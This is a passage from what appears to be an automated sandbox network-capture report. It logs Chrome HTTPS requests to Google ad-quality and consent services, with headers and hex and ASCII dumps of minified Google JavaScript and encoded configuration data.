                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1936INData Raw: 64 33 62 0d 0a 69 66 20 28 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 2e 66 63 4b 65 72 6e 65 6c 4d 61 6e 61 67 65 72 2e 72 75 6e 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 29 20 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 76 61 72 20 4e 6f 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 74 28 61 29 7d 3b 5f 2e 76 28 4e 6f 2c 5f 2e
                                                                                                                                                                                                                                                                                                                      Data Ascii: d3bif (typeof __googlefc.fcKernelManager.run === 'function') {"use strict";this.default_ContributorServingResponseClientJs=this.default_ContributorServingResponseClientJs||{};(function(_){var window=this;try{var No=function(a){this.l=_.t(a)};_.v(No,_.
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1458INData Raw: 74 41 43 6f 39 6c 4c 39 46 43 50 68 38 57 58 5f 50 6f 45 44 77 5c 5c 5c 5c 75 30 30 33 64 5c 5c 5c 5c 75 30 30 33 64 5c 5c 5c 78 32 32 5c 78 35 64 2c 6e 75 6c 6c 2c 5c 78 35 62 5c 78 35 62 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 5c 5c 78 32 32 68 74 74 70 73 3a 5c 2f 5c 2f 66 75 6e 64 69 6e 67 63 68 6f 69 63 65 73 6d 65 73 73 61 67 65 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 5c 2f 66 5c 2f 41 47 53 4b 57 78 57 62 51 42 39 7a 4c 6f 73 56 44 4f 4a 38 41 64 32 4a 67 71 63 6d 34 55 2d 5f 4f 30 58 32 54 42 48 38 70 34 75 6c 50 45 4d 52 64 36 65 5f 44 71 34 63 5a 75 4b 74 51 53 61 45 53 41 4f 35 37 57 37 4f 42 6e 4d 64 62 50 76 4c 66 55 4e 34 2d 31 33 4d 49 4b 67 4c 4a 49 38 51 30 31 37 56 39 69 51 6a 73 4b 4c 69 66 38 56 76 42 41 52 47 4d 76 51 30 64 68 4d
                                                                                                                                                                                                                                                                                                                      Data Ascii: tACo9lL9FCPh8WX_PoEDw\\\\u003d\\\\u003d\\\x22\x5d,null,\x5b\x5bnull,null,null,\\\x22https:\/\/fundingchoicesmessages.google.com\/f\/AGSKWxWbQB9zLosVDOJ8Ad2Jgqcm4U-_O0X2TBH8p4ulPEMRd6e_Dq4cZuKtQSaESAO57W7OBnMdbPvLfUN4-13MIKgLJI8Q017V9iQjsKLif8VvBARGMvQ0dhM
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      82192.168.2.450018216.58.206.654437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC537OUTGET /sodar/sodar2.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: ep2.adtrafficquality.google
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                      Referer: https://trksyln.net/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC665INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Content-Type: text/javascript
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin; report-to="adspam-signals-scs"
                                                                                                                                                                                                                                                                                                                      Report-To: {"group":"adspam-signals-scs","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/adspam-signals-scs"}]}
                                                                                                                                                                                                                                                                                                                      Content-Length: 17945
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:41 GMT
                                                                                                                                                                                                                                                                                                                      Expires: Thu, 31 Oct 2024 18:19:41 GMT
                                                                                                                                                                                                                                                                                                                      Cache-Control: private, max-age=3000
                                                                                                                                                                                                                                                                                                                      ETag: "1727224258380615"
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Server: sffe
                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC713INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 27 75 73 65 20 73 74 72 69 63 74 27 3b 66 75 6e 63 74 69 6f 6e 20 61 61 28 61 29 7b 76 61 72 20 62 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 61 5b 62 2b 2b 5d 7d 3a 7b 64 6f 6e 65 3a 21 30 7d 7d 7d 76 61 72 20 6b 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 61 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: (function(){'use strict';function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var k=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1378INData Raw: 64 20 30 3f 63 3a 61 5b 62 5d 7d 7d 0a 66 75 6e 63 74 69 6f 6e 20 78 28 61 2c 62 2c 63 29 7b 69 66 28 62 29 61 3a 7b 76 61 72 20 64 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 61 3d 64 2e 6c 65 6e 67 74 68 3d 3d 3d 31 3b 76 61 72 20 67 3d 64 5b 30 5d 2c 66 3b 21 61 26 26 67 20 69 6e 20 72 3f 66 3d 72 3a 66 3d 6e 3b 66 6f 72 28 67 3d 30 3b 67 3c 64 2e 6c 65 6e 67 74 68 2d 31 3b 67 2b 2b 29 7b 76 61 72 20 65 3d 64 5b 67 5d 3b 69 66 28 21 28 65 20 69 6e 20 66 29 29 62 72 65 61 6b 20 61 3b 66 3d 66 5b 65 5d 7d 64 3d 64 5b 64 2e 6c 65 6e 67 74 68 2d 31 5d 3b 63 3d 70 26 26 63 3d 3d 3d 22 65 73 36 22 3f 66 5b 64 5d 3a 6e 75 6c 6c 3b 62 3d 62 28 63 29 3b 62 21 3d 6e 75 6c 6c 26 26 28 61 3f 6b 28 72 2c 64 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72
                                                                                                                                                                                                                                                                                                                      Data Ascii: d 0?c:a[b]}}function x(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var g=d[0],f;!a&&g in r?f=r:f=n;for(g=0;g<d.length-1;g++){var e=d[g];if(!(e in f))break a;f=f[e]}d=d[d.length-1];c=p&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?k(r,d,{configurable:!0,wr
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1378INData Raw: 3b 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 65 61 28 61 29 7b 76 61 72 20 62 3d 74 79 70 65 6f 66 20 72 2e 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 77 28 72 2e 53 79 6d 62 6f 6c 2c 22 69 74 65 72 61 74 6f 72 22 29 26 26 61 5b 77 28 72 2e 53 79 6d 62 6f 6c 2c 22 69 74 65 72 61 74 6f 72 22 29 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 7b 6e 65 78 74 3a 61 61 28 61 29 7d 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 53 74 72 69 6e 67 28 61 29 2b 22 20 69 73 20 6e 6f 74 20 61 6e 20 69 74 65 72 61 62 6c 65 20 6f 72 20 41 72 72 61 79 4c 69 6b 65 22 29 3b 7d 76 61 72 20 66 61 3d 74 79 70 65 6f 66 20 4f
                                                                                                                                                                                                                                                                                                                      Data Ascii: ;return a}function ea(a){var b=typeof r.Symbol!="undefined"&&w(r.Symbol,"iterator")&&a[w(r.Symbol,"iterator")];if(b)return b.call(a);if(typeof a.length=="number")return{next:aa(a)};throw Error(String(a)+" is not an iterable or ArrayLike");}var fa=typeof O
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1378INData Raw: 3a 21 30 7d 7d 2c 62 2c 61 2e 67 2e 72 65 74 75 72 6e 29 3b 61 2e 67 2e 72 65 74 75 72 6e 28 62 29 3b 72 65 74 75 72 6e 20 48 28 61 29 7d 0a 66 75 6e 63 74 69 6f 6e 20 47 28 61 2c 62 2c 63 2c 64 29 7b 74 72 79 7b 76 61 72 20 67 3d 62 2e 63 61 6c 6c 28 61 2e 67 2e 68 2c 63 29 3b 69 66 28 21 28 67 20 69 6e 73 74 61 6e 63 65 6f 66 20 4f 62 6a 65 63 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 74 65 72 61 74 6f 72 20 72 65 73 75 6c 74 20 22 2b 67 2b 22 20 69 73 20 6e 6f 74 20 61 6e 20 6f 62 6a 65 63 74 22 29 3b 69 66 28 21 67 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 61 2e 67 2e 6d 3d 21 31 2c 67 3b 76 61 72 20 66 3d 67 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 61 2e 67 2e 68 3d 6e 75 6c 6c 2c 45 28 61 2e
                                                                                                                                                                                                                                                                                                                      Data Ascii: :!0}},b,a.g.return);a.g.return(b);return H(a)}function G(a,b,c,d){try{var g=b.call(a.g.h,c);if(!(g instanceof Object))throw new TypeError("Iterator result "+g+" is not an object");if(!g.done)return a.g.m=!1,g;var f=g.value}catch(e){return a.g.h=null,E(a.
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1378INData Raw: 65 6f 66 20 62 3f 65 3a 6e 65 77 20 62 28 66 75 6e 63 74 69 6f 6e 28 68 29 7b 68 28 65 29 7d 29 7d 69 66 28 61 29 72 65 74 75 72 6e 20 61 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 68 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 74 68 69 73 2e 67 3d 3d 6e 75 6c 6c 29 7b 74 68 69 73 2e 67 3d 5b 5d 3b 76 61 72 20 68 3d 74 68 69 73 3b 74 68 69 73 2e 69 28 66 75 6e 63 74 69 6f 6e 28 29 7b 68 2e 6d 28 29 7d 29 7d 74 68 69 73 2e 67 2e 70 75 73 68 28 65 29 7d 3b 76 61 72 20 67 3d 6e 2e 73 65 74 54 69 6d 65 6f 75 74 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 67 28 65 2c 30 29 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 3b 74 68 69 73 2e 67 26 26 74 68 69 73 2e 67 2e 6c 65 6e 67
                                                                                                                                                                                                                                                                                                                      Data Ascii: eof b?e:new b(function(h){h(e)})}if(a)return a;c.prototype.h=function(e){if(this.g==null){this.g=[];var h=this;this.i(function(){h.m()})}this.g.push(e)};var g=n.setTimeout;c.prototype.i=function(e){g(e,0)};c.prototype.m=function(){for(;this.g&&this.g.leng
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1378INData Raw: 74 6f 6d 45 76 65 6e 74 2c 68 3d 6e 2e 45 76 65 6e 74 2c 6c 3d 6e 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 3b 69 66 28 74 79 70 65 6f 66 20 6c 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 72 65 74 75 72 6e 21 30 3b 74 79 70 65 6f 66 20 65 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 65 3d 6e 65 77 20 65 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 74 79 70 65 6f 66 20 68 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 65 3d 6e 65 77 20 68 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 28 65 3d 6e 2e 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 2c 65 2e 69 6e 69 74
                                                                                                                                                                                                                                                                                                                      Data Ascii: tomEvent,h=n.Event,l=n.dispatchEvent;if(typeof l==="undefined")return!0;typeof e==="function"?e=new e("unhandledrejection",{cancelable:!0}):typeof h==="function"?e=new h("unhandledrejection",{cancelable:!0}):(e=n.document.createEvent("CustomEvent"),e.init
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1378INData Raw: 30 26 26 6d 28 74 29 7d 7d 76 61 72 20 74 3d 5b 5d 2c 76 3d 30 3b 64 6f 20 74 2e 70 75 73 68 28 76 6f 69 64 20 30 29 2c 76 2b 2b 2c 64 28 6c 2e 76 61 6c 75 65 29 2e 43 28 4f 28 74 2e 6c 65 6e 67 74 68 2d 31 29 2c 71 29 2c 6c 3d 68 2e 6e 65 78 74 28 29 3b 77 68 69 6c 65 28 21 6c 2e 64 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 62 7d 2c 22 65 73 36 22 29 3b 0a 78 28 22 67 6c 6f 62 61 6c 54 68 69 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7c 7c 6e 7d 2c 22 65 73 5f 32 30 32 30 22 29 3b 78 28 22 41 72 72 61 79 2e 66 72 6f 6d 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 64 29 7b 63 3d 63 21 3d 6e 75 6c 6c 3f 63 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72
                                                                                                                                                                                                                                                                                                                      Data Ascii: 0&&m(t)}}var t=[],v=0;do t.push(void 0),v++,d(l.value).C(O(t.length-1),q),l=h.next();while(!l.done)})};return b},"es6");x("globalThis",function(a){return a||n},"es_2020");x("Array.from",function(a){return a?a:function(b,c,d){c=c!=null?c:function(h){retur
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1378INData Raw: 3b 64 3c 62 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 63 2b 3d 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 62 5b 64 5d 29 2b 61 5b 64 2b 31 5d 3b 72 65 74 75 72 6e 20 4c 28 63 29 7d 3b 76 61 72 20 73 61 3d 79 28 5b 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 61 70 69 32 2f 61 66 72 61 6d 65 22 5d 29 2c 74 61 3d 50 28 73 61 29 3b 66 75 6e 63 74 69 6f 6e 20 51 28 61 2c 62 2c 63 29 7b 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 26 26 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 62 2c 63 2c 21 31 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 75 61 28 61 2c 62 29 7b 61 2e 73 72 63 3d 72 61 28 62 29 3b 76 61 72 20 63 2c 64 3b 28 63 3d 28 62 3d 28 64 3d 28 63 3d 28 61 2e 6f 77 6e 65 72
                                                                                                                                                                                                                                                                                                                      Data Ascii: ;d<b.length;d++)c+=encodeURIComponent(b[d])+a[d+1];return L(c)};var sa=y(["https://www.google.com/recaptcha/api2/aframe"]),ta=P(sa);function Q(a,b,c){a.addEventListener&&a.addEventListener(b,c,!1)};function ua(a,b){a.src=ra(b);var c,d;(c=(b=(d=(c=(a.owner
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1378INData Raw: 61 64 32 2e 67 6f 6f 67 6c 65 73 79 6e 64 69 63 61 74 69 6f 6e 2e 63 6f 6d 2f 62 67 2f 22 2c 22 2e 6a 73 22 5d 29 3b 66 75 6e 63 74 69 6f 6e 20 52 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 67 3d 77 69 6e 64 6f 77 3b 67 3d 67 3d 3d 3d 76 6f 69 64 20 30 3f 77 69 6e 64 6f 77 3a 67 3b 74 68 69 73 2e 4a 3d 62 3b 74 68 69 73 2e 68 3d 67 3b 74 68 69 73 2e 6f 3d 63 3d 3d 3d 76 6f 69 64 20 30 3f 30 3a 63 3b 74 68 69 73 2e 69 3d 28 64 3d 3d 3d 76 6f 69 64 20 30 3f 30 3a 64 29 3f 50 28 7a 61 2c 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 29 29 3a 50 28 41 61 2c 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 29 29 7d 66 75 6e 63 74 69 6f 6e 20 42 61 28 61 29 7b 72 65 74 75 72 6e 20 49 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 73 77 69 74 63
                                                                                                                                                                                                                                                                                                                      Data Ascii: ad2.googlesyndication.com/bg/",".js"]);function R(a,b,c,d){var g=window;g=g===void 0?window:g;this.J=b;this.h=g;this.o=c===void 0?0:c;this.i=(d===void 0?0:d)?P(za,encodeURIComponent(a)):P(Aa,encodeURIComponent(a))}function Ba(a){return I(function(b){switc
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:41 UTC1378INData Raw: 78 74 3a 46 61 28 61 2e 5f 63 74 78 5f 29 2c 41 3a 61 2e 5f 62 67 76 5f 2c 76 3a 61 2e 5f 62 67 70 5f 2c 47 3a 61 2e 5f 6c 69 5f 2c 46 3a 61 2e 5f 6a 6b 5f 2c 48 3a 47 61 28 61 2e 5f 73 74 5f 29 2c 49 3a 61 2e 5f 72 63 5f 2c 6f 3a 61 2e 5f 64 6c 5f 2c 44 3a 61 2e 5f 67 32 5f 2c 6a 3a 48 61 28 61 2e 5f 61 74 71 67 5f 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 4a 61 28 29 7b 76 61 72 20 61 3d 77 69 6e 64 6f 77 3b 69 66 28 61 2e 47 6f 6f 67 6c 65 44 58 35 59 4b 55 53 6b 29 72 65 74 75 72 6e 20 61 2e 47 6f 6f 67 6c 65 44 58 35 59 4b 55 53 6b 5b 30 5d 3b 76 61 72 20 62 3d 6e 65 77 20 72 2e 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 61 2e 47 6f 6f 67 6c 65 44 58 35 59 4b 55 53 6b 3d 5b 62 2c 63 5d 7d 29 3b 72 65 74 75 72 6e 20 62 7d 0a 66 75 6e 63 74
                                                                                                                                                                                                                                                                                                                      Data Ascii: xt:Fa(a._ctx_),A:a._bgv_,v:a._bgp_,G:a._li_,F:a._jk_,H:Ga(a._st_),I:a._rc_,o:a._dl_,D:a._g2_,j:Ha(a._atqg_)}}function Ja(){var a=window;if(a.GoogleDX5YKUSk)return a.GoogleDX5YKUSk[0];var b=new r.Promise(function(c){a.GoogleDX5YKUSk=[b,c]});return b}funct


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      83192.168.2.451197142.250.185.664437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:42 UTC401OUTGET /getconfig/sodar?sv=200&tid=gda&tv=r20241028&st=env HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: ep1.adtrafficquality.google
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:42 UTC610INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
                                                                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:42 GMT
                                                                                                                                                                                                                                                                                                                      Server: cafe
                                                                                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:42 UTC768INData Raw: 34 32 62 31 0d 0a 7b 22 73 6f 64 61 72 5f 71 75 65 72 79 5f 69 64 22 3a 22 50 73 6f 6a 5a 38 47 32 46 66 54 6f 78 5f 41 50 34 4d 53 52 51 51 22 2c 22 69 6e 6a 65 63 74 6f 72 5f 62 61 73 65 6e 61 6d 65 22 3a 22 73 6f 64 61 72 32 22 2c 22 62 67 5f 68 61 73 68 5f 62 61 73 65 6e 61 6d 65 22 3a 22 4c 4b 4e 56 54 43 42 6d 6d 38 4c 4f 4e 4d 41 46 68 34 76 5a 61 54 49 6b 54 4b 76 72 77 39 4e 43 63 47 62 47 4a 42 78 62 6a 45 38 22 2c 22 62 67 5f 62 69 6e 61 72 79 22 3a 22 66 6c 52 44 32 48 31 31 63 30 75 56 66 4d 63 7a 56 71 36 31 4d 49 6d 53 55 78 64 43 6c 31 63 69 61 4f 4d 68 39 74 50 42 53 49 71 68 41 6f 64 77 67 78 61 34 78 54 64 65 6f 76 62 6a 65 5a 66 6e 4d 6c 54 61 6f 48 75 39 4c 76 6f 54 61 2b 73 50 4e 65 6e 71 36 38 33 35 6b 4c 75 55 57 44 55 48 4e 72 71
                                                                                                                                                                                                                                                                                                                      Data Ascii: 42b1{"sodar_query_id":"PsojZ8G2FfTox_AP4MSRQQ","injector_basename":"sodar2","bg_hash_basename":"LKNVTCBmm8LONMAFh4vZaTIkTKvrw9NCcGbGJBxbjE8","bg_binary":"flRD2H11c0uVfMczVq61MImSUxdCl1ciaOMh9tPBSIqhAodwgxa4xTdeovbjeZfnMlTaoHu9LvoTa+sPNenq6835kLuUWDUHNrq
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:42 UTC1378INData Raw: 79 2b 33 6a 30 35 63 50 73 65 78 58 66 68 30 46 65 6e 2f 6c 2f 32 2f 5a 66 70 30 70 75 61 5a 78 6a 79 6f 66 41 77 66 6b 68 38 75 52 43 36 41 65 4c 50 48 32 37 57 6c 72 62 58 53 72 35 79 77 48 4f 78 67 78 4b 32 39 78 4c 45 4b 47 41 49 2f 6f 50 46 53 66 2b 65 6c 42 52 33 67 69 69 56 38 65 34 33 46 79 6d 73 56 44 37 55 65 75 63 61 6d 32 45 35 79 58 6b 4c 72 46 6b 72 4f 4a 51 49 62 37 48 41 37 6f 46 55 52 47 2f 43 4e 59 30 65 55 4e 6c 32 61 6b 4b 4d 68 49 76 75 6d 47 50 4c 64 5a 46 71 43 30 6c 35 35 76 67 34 4b 30 67 50 73 59 4a 45 4c 51 73 36 41 66 35 42 70 75 4a 44 75 36 37 67 73 4c 37 4b 72 6d 31 78 77 42 50 6f 6d 4b 4f 78 67 6a 58 61 44 35 61 2f 7a 73 53 4e 70 39 6a 4b 4c 43 64 32 48 61 37 4c 71 6d 77 52 78 68 46 34 32 6b 65 6b 43 46 58 43 2f 6f 54 43 4b
                                                                                                                                                                                                                                                                                                                      Data Ascii: y+3j05cPsexXfh0Fen/l/2/Zfp0puaZxjyofAwfkh8uRC6AeLPH27WlrbXSr5ywHOxgxK29xLEKGAI/oPFSf+elBR3giiV8e43FymsVD7Ueucam2E5yXkLrFkrOJQIb7HA7oFURG/CNY0eUNl2akKMhIvumGPLdZFqC0l55vg4K0gPsYJELQs6Af5BpuJDu67gsL7Krm1xwBPomKOxgjXaD5a/zsSNp9jKLCd2Ha7LqmwRxhF42kekCFXC/oTCK
